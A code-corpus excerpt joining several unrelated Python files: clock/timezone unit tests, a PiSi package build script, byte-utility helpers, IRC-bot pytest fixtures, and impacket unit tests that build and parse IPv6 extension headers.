dtfmt = "time is: %H:%M:%S %z on %Y-%m-%d "
dtstr = self.localnow.strftime(dtfmt)
self.assertEqual(strptimez(dtstr, dtfmt), self.utcnow)
class ClockTest(unittest.TestCase):
def get_now_times(self):
localnow = datetime.now(tzlocal()).replace(microsecond=0)
utcnow = localnow.astimezone(tzutc())
return (localnow, utcnow)
def test_clock_localnow(self):
"""
Local time computation matches
"""
testrnow = self.get_now_times()[0].replace(second=0)
clocknow = Clock.localnow().replace(second=0,microsecond=0)
self.assertEqual(testrnow, clocknow)
def test_clock_utcnow(self):
"""
UTC time computation matches
"""
testrnow = self.get_now_times()[1].replace(second=0)
clocknow = Clock.utcnow().replace(second=0,microsecond=0)
self.assertEqual(testrnow, clocknow)
def test_local_offset(self):
"""
Assert local time is offset UTC
"""
localnow = Clock.localnow().replace(second=0, microsecond=0)
utcnow = Clock.utcnow().replace(second=0, microsecond=0)
offset = int(localnow.strftime('%z'))
delta = timedelta(hours = offset/100)
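        # assumes a whole-hour UTC offset; half-hour zones (e.g. +0530) would
        # not survive the integer division by 100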
offnow = localnow - delta
self.assertEqual(offnow.replace(tzinfo=None), utcnow.replace(tzinfo=None))
def test_local_utc_diff(self):
"""
Assert local time is not UTC time
"""
localnow = Clock.localnow().replace(second=0, microsecond=0)
utcnow = Clock.utcnow().replace(second=0, microsecond=0)
if localnow.strftime('%z') == utcnow.strftime('%z'):
self.assertEqual(localnow, utcnow)
else:
self.assertNotEqual(localnow.replace(tzinfo=None), utcnow.replace(tzinfo=None))
def test_clock_format(self):
"""
Format works with fmt string
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock()
self.assertEqual(dts.strftime(fmt), clk.format(dts, fmt))
def test_clock_simple_format(self):
"""
Test named formats
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock()
self.assertEqual(dts.strftime(fmt), clk.format(dts, "iso"))
def test_default_format(self):
"""
Assert defaults can be passed in
"""
fmt = "%Y-%m-%dT%H:%M:%S%z"
dts = self.get_now_times()[0]
clk = Clock(default="iso")
self.assertEqual(dts.strftime(fmt), clk.format(dts))
def test_isoutc_formatter(self):
"""
Test ISO UTC formatter
"""
clk = Clock("iso", local=False)
lcl = self.get_now_times()[1]
self.assertEqual(str(clk), lcl.strftime("%Y-%m-%dT%H:%M:%S%z"))
|
tipsybear/zerocycle
|
tests/utils_tests/timez_tests.py
|
Python
|
gpl-2.0
| 4,919
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/copyleft/gpl.txt
from pisi.actionsapi import pythonmodules
#from pisi.actionsapi import pisitools
# if pisi can't find source directory, see /var/pisi/python-elib.intl/work/ and:
# WorkDir="python-elib.intl-"+ get.srcVERSION() +"/sub_project_dir/"
def build():
pythonmodules.compile()
def install():
pythonmodules.install()
# Take a look at the source folder for these file as documentation.
# pisitools.dodoc("AUTHORS", "BUGS", "ChangeLog", "COPYING", "README")
# If there is no install rule for a runnable binary, you can
# install it to binary directory.
# pisitools.dobin("python-elib.intl")
# You can use these as variables, they will replace GUI values before build.
# Package Name : python-elib.intl
# Version : 0.0.3
# Summary : Enhanced internationalization (I18N) for Python
# For more information, you can look at the Actions API
# from the Help menu and toolbar.
# By PiSiDo 2.0.0
|
pisiganesh/my_pisi_files
|
python-elib.intl/actions.py
|
Python
|
gpl-2.0
| 1,053
|
import sys
def addAll(aList, elements):
# assert type(elements) is list
# assert type(aList) is list
for e in elements:
aList.append(e)
def removeAll(aDict, elements):
# assert type(elements) is list
# assert type(aDict) is dict
for e in elements:
if e in aDict:
del aDict[e]
def byteArrayXor(result, input2):
# assert type(result) is list
# assert type(input2) is list
length = min(len(result), len(input2))
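    # XOR in place over the overlapping prefix; any extra bytes in the longer
    # list are left untouched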
for index in range(length):
result[index] = result[index] ^ input2[index]
def getByteSize(q):
return q//8 + (1 if q % 8 != 0 else 0)
if __name__ == "__main__":
sys.path.append("../../test/testcore")
from testUtil import *
unittest.main(verbosity=2)
# # getByteSize
# q = 9
# assert 2 == getByteSize(q)
#
# # byteArrayXor
# input1 = [255, 0]
# input2 = [0, 255]
# byteArrayXor(input1, input2)
# assert input1 == [255, 255]
# input1 = [255, 255]
# input2 = [255, 255]
# #print input1
# byteArrayXor(input1, input2)
# #print input1
# assert input1 == [0, 0]
#
# # addAll simple unit test
# a = []
# addAll(a, ['b','c'])
# assert a == ['b','c']
#
# # removeAll simple unit test
# a = {'a':10, 'b':20, 'c':30}
# removeAll(a, ['a','c'])
# assert len(a) == 1
# assert a['b'] == 20, "ERROR b should be 20 , but we have %d" % a['b']
|
CSNoyes/BitAV
|
ScanningEngine/Python/BloomierFilter/core/util.py
|
Python
|
gpl-2.0
| 1,484
|
from grazyna.db import get_engine, create_database
from grazyna.test_mocks.sender import IrcSender
from grazyna.test_mocks.importer import Importer
from grazyna.request import RequestBot
from grazyna.irc.models import User
import pytest
@pytest.fixture()
def protocol():
return IrcSender()
@pytest.fixture()
def protocol_with_db():
client = IrcSender()
db_uri = client.config.get('main', 'db_uri')
client.db = get_engine(db_uri)
create_database(client.db)
return client
@pytest.fixture()
def protocol_with_importer():
client = IrcSender()
client.importer = Importer(client)
return client
@pytest.fixture
def public_bot(protocol):
return RequestBot(
protocol=protocol,
user=User('socek!a@b'),
chan='#czarnobyl',
private=False,
config={},
temp={},
)
@pytest.fixture
def public_bot_with_db(protocol_with_db):
return RequestBot(
protocol=protocol_with_db,
user=User('socek!a@b'),
chan='#czarnobyl',
private=False,
config={},
temp={},
)
@pytest.fixture
def private_bot(protocol):
return RequestBot(
protocol=protocol,
user=User('socek!a@b'),
private=True,
config={},
temp={},
)
@pytest.fixture
def bot_with_importer(protocol_with_importer):
return RequestBot(
protocol=protocol_with_importer,
user=User('socek!a@b'),
chan='#czarnobyl',
)
|
firemark/grazyna
|
conftest.py
|
Python
|
gpl-2.0
| 1,477
|
#!/usr/bin/env python
import sys
sys.path.insert(0,"../..")
#Impact test version
try:
from impacket import IP6_Address, IP6, ImpactDecoder, IP6_Extension_Headers
except ImportError:
pass
#Standalone test version
try:
import sys
sys.path.insert(0,"../..")
import IP6_Address, IP6, ImpactDecoder, IP6_Extension_Headers
except ImportError:
pass
import unittest
class TestIP6(unittest.TestCase):
def string_to_list(self, bytes):
return map(ord, list(bytes))
def test_create_simple_hop_by_hop(self):
hop_by_hop_binary_packet = [0x3a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00]
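        # layout: Next Header (0x3a = ICMPv6), Hdr Ext Len (0), then a PadN
        # option (type 0x01, length 4) padding the header out to 8 octets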
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Simple Hop By Hop Header creation - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Simple Hop By Hop Header creation - Size mismatch")
def test_simple_hop_by_hop_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
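        # byte 6 of the fixed header (0x00 here) is the Next Header field:
        # 0 = Hop-by-Hop, chaining into the extension header appended below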
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x01, 0x04,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
ip6_packet.contains(hop_by_hop)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Hop By Hop Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Hop By Hop Header contained in IPv6 Header - Size mismatch")
def test_add_option_to_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Add Option to Hop By Hop Header - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Add Option to Hop By Hop Header - Size mismatch")
def test_pad_hop_by_hop_when_adding_option(self):
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.set_next_header(58)
hop_by_hop.add_option(IP6_Extension_Headers.Option_PAD1())
self.assertEquals(
self.string_to_list(hop_by_hop.get_packet()), hop_by_hop_binary_packet,
"Pad Hop By Hop Header when adding option - Buffer mismatch")
self.assertEquals(
hop_by_hop.get_size(), len(hop_by_hop_binary_packet),
"Pad Hop By Hop Header when adding option - Size mismatch")
def test_create_simple_dest_opts(self):
dest_opts_binary_packet = [0x3a, 0x00, 0x01, 0x04, 0x00, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Simple Destination Options Header creation - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Simple Destination Options Header creation - Size mismatch")
def test_simple_dest_opts_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x3c, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
dest_opts_binary_packet = [
0x3a, 0x00, 0x01, 0x04,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + dest_opts_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
ip6_packet.contains(dest_opts)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Destination Options Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Destination Options Header contained in IPv6 Header - Size mismatch")
def test_add_option_to_dest_opts(self):
dest_opts_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
dest_opts.add_option(IP6_Extension_Headers.Option_PADN(14))
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Add Option to Destination Options Header - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Add Option to Destination Options Header - Size mismatch")
def test_pad_dest_opts_when_adding_option(self):
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.set_next_header(58)
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), dest_opts_binary_packet,
"Pad Destination Options Header when adding option - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(dest_opts_binary_packet),
"Pad Destination Options Header when adding option - Size mismatch")
def test_create_simple_routing_options(self):
routing_options_binary_packet = [0x3a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
self.assertEquals(
self.string_to_list(routing_options.get_packet()), routing_options_binary_packet,
"Simple Routing Options Header creation - Buffer mismatch")
self.assertEquals(
routing_options.get_size(), len(routing_options_binary_packet),
"Simple Routing Options Header creation - Size mismatch")
def test_simple_routing_options_contained_in_ipv6(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x2b, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
routing_options_binary_packet = [
0x3a, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + routing_options_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
ip6_packet.contains(routing_options)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"IP6 Hop By Hop Header contained in IPv6 Header - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"IP6 Hop By Hop Header contained in IPv6 Header - Size mismatch")
def test_chained_basic_options(self):
dest_opts_binary_packet = [
0x2b, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x00, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
hop_by_hop_binary_packet = [
0x3a, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
binary_packet = dest_opts_binary_packet + routing_options_binary_packet + hop_by_hop_binary_packet
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
dest_opts.contains(routing_options)
routing_options.contains(hop_by_hop)
hop_by_hop.set_next_header(58)
self.assertEquals(
self.string_to_list(dest_opts.get_packet()), binary_packet,
"Chained options - Buffer mismatch")
self.assertEquals(
dest_opts.get_size(), len(binary_packet),
"Chained options - Size mismatch")
def test_chained_basic_options_inside_ipv6_packet(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x3c, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet + routing_options_binary_packet + dest_opts_binary_packet
ip6_packet = IP6.IP6()
ip6_packet.set_traffic_class(72)
ip6_packet.set_flow_label(148997)
ip6_packet.set_payload_length(1500)
ip6_packet.set_next_header(17)
ip6_packet.set_hop_limit(1)
ip6_packet.set_source_address("FE80::78F8:89D1:30FF:256B")
ip6_packet.set_destination_address("FF02::1:3")
hop_by_hop = IP6_Extension_Headers.Hop_By_Hop()
hop_by_hop.add_option(IP6_Extension_Headers.Option_PADN(14))
routing_options = IP6_Extension_Headers.Routing_Options()
routing_options.set_next_header(58)
routing_options.set_routing_type(0)
routing_options.set_segments_left(10)
dest_opts = IP6_Extension_Headers.Destination_Options()
dest_opts.add_option(IP6_Extension_Headers.Option_PAD1())
ip6_packet.contains(hop_by_hop)
hop_by_hop.contains(routing_options)
routing_options.contains(dest_opts)
dest_opts.set_next_header(58)
self.assertEquals(
self.string_to_list(ip6_packet.get_packet()), binary_packet,
"Chained options inside an IPv6 packet - Buffer mismatch")
self.assertEquals(
ip6_packet.get_size(), len(binary_packet),
"Chained options inside an IPv6 packet - Size mismatch")
def test_decoding_simple_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Simple Hop By Hop Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Hop By Hop Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Hop By Hop Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Hop By Hop Parsing - Incorrect option size")
def test_decoding_multi_option_hop_by_hop(self):
hop_by_hop_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(2, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
pad1_option = options[0]
pad1_option_type = pad1_option.get_option_type()
padn_option = options[1]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Hop By Hop with multiple options parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Hop By Hop with multiple options parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Hop By Hop with multiple options parsing - Incorrect size")
self.assertEquals(pad1_option_type, 0, "Hop By Hop with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_type, 1, "Hop By Hop with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_length, 3, "Hop By Hop with multiple options parsing - Incorrect option size")
def test_decoding_simple_destination_options(self):
destination_options_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.DestinationOptionsDecoder()
parsed_packet = d.decode(destination_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Destination Options Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 60, "Simple Destination Options Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Destination Options Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Destination Options Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Destination Options Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Destination Options Parsing - Incorrect option size")
def test_decoding_multi_option_destination_options(self):
destination_options_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
d = ImpactDecoder.DestinationOptionsDecoder()
parsed_packet = d.decode(destination_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(2, len(options), "Destination Options with multiple options parsing - Wrong Quantity of Options")
pad1_option = options[0]
pad1_option_type = pad1_option.get_option_type()
padn_option = options[1]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 60, "Destination Options with multiple options parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Destination Options with multiple options parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Destination Options with multiple options parsing - Incorrect size")
self.assertEquals(pad1_option_type, 0, "Destination Options with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_type, 1, "Destination Options with multiple options parsing - Incorrect option type")
self.assertEquals(padn_option_length, 3, "Destination Options with multiple options parsing - Incorrect option size")
def test_decoding_simple_routing_options(self):
routing_options_binary_packet = [0x3a, 0x00, 0x00, 0x0a, 0x00, 0x00, 0x00, 0x00]
d = ImpactDecoder.RoutingOptionsDecoder()
parsed_packet = d.decode(routing_options_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
routing_type = parsed_packet.get_routing_type()
segments_left = parsed_packet.get_segments_left()
options = parsed_packet.get_options()
self.assertEquals(parsed_packet.get_header_type(), 43, "Simple Routing Options Parsing - Incorrect packet")
self.assertEquals(next_header, 58, "Simple Routing Options Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 0, "Simple Routing Options Parsing - Incorrect size")
self.assertEquals(routing_type, 0, "Simple Routing Options Parsing - Incorrect routing type")
        self.assertEquals(segments_left, 10, "Simple Routing Options Parsing - Incorrect quantity of segments left")
self.assertEquals(0, len(options), "Simple Routing Options Parsing - Wrong Quantity of Options")
def test_decoding_chained_basic_options_inside_ipv6_packet(self):
ipv6_binary_packet = [
0x64, 0x82, 0x46, 0x05,
0x05, 0xdc, 0x00, 0x01,
0xfe, 0x80, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x78, 0xf8, 0x89, 0xd1,
0x30, 0xff, 0x25, 0x6b,
0xff, 0x02, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x01, 0x00, 0x03]
hop_by_hop_binary_packet = [
0x2b, 0x01, 0x01, 0x0C,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00]
routing_options_binary_packet = [
0x3c, 0x00, 0x00, 0x0a,
0x00, 0x00, 0x00, 0x00]
dest_opts_binary_packet = [
0x3a, 0x00, 0x00, 0x01,
0x03, 0x00, 0x00, 0x00]
binary_packet = ipv6_binary_packet + hop_by_hop_binary_packet + routing_options_binary_packet + dest_opts_binary_packet
d = ImpactDecoder.IP6Decoder()
parsed_ipv6_packet = d.decode(binary_packet)
# IPv6 Parsing
ipv6_protocol_version = parsed_ipv6_packet.get_protocol_version()
ipv6_traffic_class = parsed_ipv6_packet.get_traffic_class()
ipv6_flow_label = parsed_ipv6_packet.get_flow_label()
ipv6_payload_length = parsed_ipv6_packet.get_payload_length()
ipv6_next_header = parsed_ipv6_packet.get_next_header()
ipv6_hop_limit = parsed_ipv6_packet.get_hop_limit()
ipv6_source_address = parsed_ipv6_packet.get_source_address()
ipv6_destination_address = parsed_ipv6_packet.get_destination_address()
# Hop By Hop Parsing
hop_by_hop_parsed_packet = parsed_ipv6_packet.child()
hop_by_hop_next_header = hop_by_hop_parsed_packet.get_next_header()
hop_by_hop_header_extension_length = hop_by_hop_parsed_packet.get_header_extension_length()
hop_by_hop_options = hop_by_hop_parsed_packet.get_options()
self.assertEquals(1, len(hop_by_hop_options), "Hop By Hop Parsing - Wrong Quantity of Options")
hop_by_hop_padn_option = hop_by_hop_options[0]
hop_by_hop_padn_option_type = hop_by_hop_padn_option.get_option_type()
hop_by_hop_padn_option_length = hop_by_hop_padn_option.get_option_length()
# Routing Options Tests
routing_options_parsed_packet = hop_by_hop_parsed_packet.child()
routing_options_next_header = routing_options_parsed_packet.get_next_header()
routing_options_header_extension_length = routing_options_parsed_packet.get_header_extension_length()
routing_options_routing_type = routing_options_parsed_packet.get_routing_type()
routing_options_segments_left = routing_options_parsed_packet.get_segments_left()
routing_options_options = routing_options_parsed_packet.get_options()
# Destination Options Parsing
destination_options_parsed_packet = routing_options_parsed_packet.child()
destination_options_next_header = destination_options_parsed_packet.get_next_header()
destination_options_header_extension_length = destination_options_parsed_packet.get_header_extension_length()
destination_options_options = destination_options_parsed_packet.get_options()
self.assertEquals(2, len(destination_options_options), "Destination Options Parsing - Wrong Quantity of Options")
destination_options_pad1_option = destination_options_options[0]
destination_options_pad1_option_type = destination_options_pad1_option.get_option_type()
destination_options_padn_option = destination_options_options[1]
destination_options_padn_option_type = destination_options_padn_option.get_option_type()
destination_options_padn_option_length = destination_options_padn_option.get_option_length()
self.assertEquals(ipv6_protocol_version, 6, "IP6 parsing - Incorrect protocol version")
self.assertEquals(ipv6_traffic_class, 72, "IP6 parsing - Incorrect traffic class")
self.assertEquals(ipv6_flow_label, 148997, "IP6 parsing - Incorrect flow label")
self.assertEquals(ipv6_payload_length, 1500, "IP6 parsing - Incorrect payload length")
self.assertEquals(ipv6_next_header, 0, "IP6 parsing - Incorrect next header")
self.assertEquals(ipv6_hop_limit, 1, "IP6 parsing - Incorrect hop limit")
self.assertEquals(ipv6_source_address.as_string(), "FE80::78F8:89D1:30FF:256B", "IP6 parsing - Incorrect source address")
self.assertEquals(ipv6_destination_address.as_string(), "FF02::1:3", "IP6 parsing - Incorrect destination address")
self.assertEquals(hop_by_hop_parsed_packet.get_header_type(), 0, "Hop By Hop Parsing - Incorrect packet")
self.assertEquals(hop_by_hop_next_header, 43, "Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(hop_by_hop_header_extension_length, 1, "Hop By Hop Parsing - Incorrect size")
self.assertEquals(hop_by_hop_padn_option_type, 1, "Hop By Hop Parsing - Incorrect option type")
self.assertEquals(hop_by_hop_padn_option_length, 12, "Hop By Hop Parsing - Incorrect option size")
self.assertEquals(routing_options_parsed_packet.get_header_type(), 43, "Routing Options Parsing - Incorrect packet")
self.assertEquals(routing_options_next_header, 60, "Routing Options Parsing - Incorrect next header value")
self.assertEquals(routing_options_header_extension_length, 0, "Routing Options Parsing - Incorrect size")
self.assertEquals(routing_options_routing_type, 0, "Routing Options Parsing - Incorrect routing type")
        self.assertEquals(routing_options_segments_left, 10, "Routing Options Parsing - Incorrect quantity of segments left")
self.assertEquals(0, len(routing_options_options), "Routing Options Parsing - Wrong Quantity of Options")
self.assertEquals(destination_options_parsed_packet.get_header_type(), 60, "Destination Options Parsing - Incorrect packet")
self.assertEquals(destination_options_next_header, 58, "Destination Options Parsing - Incorrect next header value")
self.assertEquals(destination_options_header_extension_length, 0, "Destination Options Parsing - Incorrect size")
self.assertEquals(destination_options_pad1_option_type, 0, "Destination Options Parsing - Incorrect option type")
self.assertEquals(destination_options_padn_option_type, 1, "Destination Options Parsing - Incorrect option type")
self.assertEquals(destination_options_padn_option_length, 3, "Destination Options Parsing - Incorrect option size")
def test_decoding_extension_header_from_string(self):
hop_by_hop_binary_packet = '\x2b\x01\x01\x0C\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
d = ImpactDecoder.HopByHopDecoder()
parsed_packet = d.decode(hop_by_hop_binary_packet)
next_header = parsed_packet.get_next_header()
header_extension_length = parsed_packet.get_header_extension_length()
options = parsed_packet.get_options()
self.assertEquals(1, len(options), "Simple Hop By Hop Parsing - Wrong Quantity of Options")
padn_option = options[0]
padn_option_type = padn_option.get_option_type()
padn_option_length = padn_option.get_option_length()
self.assertEquals(parsed_packet.get_header_type(), 0, "Simple Hop By Hop Parsing - Incorrect packet")
self.assertEquals(next_header, 43, "Simple Hop By Hop Parsing - Incorrect next header value")
self.assertEquals(header_extension_length, 1, "Simple Hop By Hop Parsing - Incorrect size")
self.assertEquals(padn_option_type, 1, "Simple Hop By Hop Parsing - Incorrect option type")
self.assertEquals(padn_option_length, 12, "Simple Hop By Hop Parsing - Incorrect option size")
suite = unittest.TestLoader().loadTestsFromTestCase(TestIP6)
unittest.TextTestRunner(verbosity=2).run(suite)
|
prasadtalasila/INET-Vagrant-Demos
|
